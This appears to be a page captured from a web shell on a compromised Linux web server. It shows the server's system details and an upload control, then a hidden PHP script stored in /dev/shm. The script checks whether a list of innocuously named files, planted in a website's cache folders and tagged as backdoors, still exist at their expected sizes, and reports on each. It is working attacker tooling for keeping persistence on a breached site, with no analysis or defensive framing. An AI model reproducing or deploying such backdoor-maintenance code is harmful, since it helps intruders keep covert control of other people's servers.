HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: //dev/shm/.bind
<?php   $r = '/home/httpd/html/baretube.com'; $x = ["/cache/a/0/4/5/1/function_name.php"=>"bd@@338485@@610",
"/cache/a/0/4/5/1/admin_files.php"=>"bd@@338561@@1067",
"/cache/0/4/7/3/d/help_0.php"=>"bd@@369811@@575",
"/cache/0/5/5/2/7/cb.php"=>"bd@@369826@@682",
"/cache/1/2/b/7/5/dispimgthumb.php"=>"bd@@369829@@896",
"/cache/1/4/c/2/a/help_about.php"=>"bd@@369837@@625",
"/cache/1/6/a/b/3/TAMARecord.class.php"=>"bd@@369843@@889"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');